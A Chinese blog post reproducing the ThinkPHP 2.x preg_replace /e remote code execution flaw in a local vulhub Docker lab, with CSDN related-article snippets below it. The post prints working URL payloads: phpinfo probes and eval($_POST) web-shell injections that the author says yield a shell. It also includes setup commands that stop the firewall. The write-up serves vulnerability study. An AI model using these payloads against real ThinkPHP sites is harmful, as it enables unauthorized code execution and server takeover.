thinkphp 2 - rce漏洞复现

已于 2023-08-10 11:55:50 修改
阅读量224 收藏
点赞数
文章标签: 笔记 web安全
于 2023-08-06 19:40:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59405467/article/details/132134563
版权
文章讲述了ThinkPHP2.x中的preg_replace函数由于/e模式导致的代码执行漏洞,详细介绍了漏洞利用方法,如通过构建URL触发payload,以及在vulhub环境中的复现步骤,包括使用docker和IP地址。
摘要由CSDN通过智能技术生成

目录

漏洞详情

漏洞影响版本

漏洞利用

漏洞复现

进入vulhub/thinkphp/2-rce

拉取环境

docker inspect 容器ID

查看docker搭建的ip地址

火狐打开

输入poc

复现成功

漏洞详情

使用了危险函数:preg_replace的/e模式匹配路由: preg_replace 函数执行一个正则表达式的搜索和替换。

preg_replace ( mixed $pattern , mixed $replacement , mixed $subject  )

preg_replace(‘正则规则’,‘替换字符’,‘目标字符’)

$pattern: 要搜索的模式,可以是字符串或一个字符串数组。

$replacement: 用于替换的字符串或字符串数组。

$subject: 要搜索替换的目标字符串或字符串数组。

如果目标字符存在符合正则规则的字符,那么就替换为替换字符,如果此时正则规则中使用了/e这个修饰符,则存在代码执行漏洞。

漏洞影响版本

ThinkPHP 2.x

漏洞利用

?index.php/module/aciton/param1/${@phpinfo()}

?s=/Index/index/L/${@phpinfo()}

漏洞复现

进入vulhub/thinkphp/2-rce

然后

拉取环境

systemctl start docker

systemctl stop firewalld.service

docker-compose up -d

docker inspect 容器ID

查看docker搭建的ip地址

Ipaddress:172.23.0.2

火狐打开

输入poc

?s=/index/index/name/${@phpinfo()}

复现成功

?index.php/module/aciton/param1/${@print(eval($_POST['123']))}

?s=/Index/index/L/${@print(eval($_POST['1']))}

两种方法都可以成功连接到shell。

Tender…
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
ThinkPHP2.2 完整版
01-18
ThinkPHP是一个性能卓越并且功能丰富的轻量级PHP开发框架,本身具有很多的原创特性,并且倡导大道至简,开发由我的开发理念,用最少的代码完成更多的功能,宗旨就是让WEB应用开发更简单、更快速。遵循Apache2开源协议发布,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,2.1版本更是在之前的基础上,经过全新的重构和无数次的完善以及改进,达到了一个新的阶段,足以达到企业级和门户级的开发标准。 使用ThinkPHP,你可以更方便和快捷的开发和部署应用,当然不仅仅是企业级应用,任何PHP应用开发都可以从ThinkPHP的简单、快速的特性中受益。简洁、快速和实用是ThinkPHP发展秉承的宗旨,为此ThinkPHP会不断吸收和融入更好的技术以保证其新鲜和活力,提供WEB应用开发的最佳实践!
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
thinkphp 2-rce
weixin_51692662的博客
11-01 501
thinkphp 2-rce
初识thinkphp(2)
qq_38703140的博客
06-05 145
thinkphp的url路径的表示格式为http://ip/tp/public/index.php/模块/控制器/操作这里url最后的操作就是类里面的函数。0x01:url访问格式官方文档中有个驼峰的命名方法比如你实际目录名写的“HelloWorld”,但在解析的时候会成“helloworld”即默认转化为小写。针对这个问题,可以把url写成“../hello_world/”等价于HelloWor...
thinkPHP2
weixin_34162401的博客
05-02 133
视图渲染 display 获取具体内容,并自动输出 $this->display();同名模板 $this->display('showView');showView模板 $this->display('Index:add');index目录下的add模板 $this->display('Admin@Index:add');Admin模块下的Index目录下的add模板...
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析 ThinkPHP 是一个流行的 PHP 框架,它提供了许多实用的功能来帮助开发者快速构建 Web 应用程序。然而,在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution(RCE...
ThinkPHP3.2.x RCE漏洞通报1
08-03
ThinkPHP3.2.x RCE漏洞通报】中提到的安全问题涉及到ThinkPHP 3.2版本的一个严重远程代码执行漏洞。这个漏洞源于框架中的`assign`方法,该方法用于将变量传递给模板进行渲染。当攻击者能够控制`assign`方法的第一...
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1.x 变量覆盖远程代码执行(RCE漏洞分析 #### 漏洞概述 ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行(RCE漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心...
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x , 可以利用poc直接检测目标网站是否存在漏洞
thinkphp2.1 中文web应用开发框架
11-11
thinkphp2.1 中文web应用开发框架 源码
ThinkPHP2.1 完全开发手册
01-03
ThinkPHP2.1 完全开发手册 开发文档 原来的2.1版本的 有需要的支持下
Thinkphp 2.x rce
qq_53086690的博客
11-23 928
Thinkphp 2.x rce Thinkphp简介 Thinkphp 是一个开源的,快速、简单的面向对象的轻量级PHP开发框架 漏洞影响版本 Thinkphp 2.x 漏洞概述 ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 导致用户的输入参数被插入双引号中执行,
[ThinkPHP]2-Rce 复现
satasun的博客
12-07 1550
[ThinkPHP]2-Rce 复现 环境搭建 github传送门 BUU传送门 POC 老懒狗选择buu http://node3.buuoj.cn:26104/ poc http://node3.buuoj.cn:26104?s=/index/index/name/$%7B@phpinfo()%7D exp 我试了一下直接用system调用命令好像不行,可能因为中间掺杂了一些符号,这边利用eval函数进行绕过。 http://node3.buuoj.cn:26104/?s=/index/index
buuctf [ThinkPHP]2-Rce
qq_1873822的博客
03-14 676
ThinkPHP 2.1 poc ?s=/index/index/shell/${@phpinfo()} 拿到flag
thinkphp2rce漏洞复现
mlws1900的博客
07-07 1072
0x01 漏洞描述 描述: ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞0x02 影响版本 影响Thinkphp 2.x的版本0x03 漏洞利用root权限启动docker(我用kali不给root没法搭建环境) 查看docker进
Thinkphp 2.x 任意代码执行漏洞
最新发布
hovcfuti的博客
10-13 258
漏洞简介ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。preg_replace这个函数使用方法如下:preg_replace('正则规则','替换字符','目标字符')这个函数的3个参数,结合起来的意思是:如果目标字符存在符合正则规则的字符,那么就替换为替换字符,如果此时正则规则中使用了/e这个修饰符,则存在代码执行漏洞
thinkphp 2.x 任意代码执行
qq_41048303的博客
12-16 1783
thinkphp 2.x任意代码执行 1.漏洞概述 ​ ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); ​ 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。 ​ ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。 2.环境搭
thinkphp2.x任意代码执行漏洞学习笔记
Hezhoutheone的博客
09-23 1140
漏洞实验环境 靶机:Ubuntu虚拟机 攻击机:Windows10
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Tender…

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值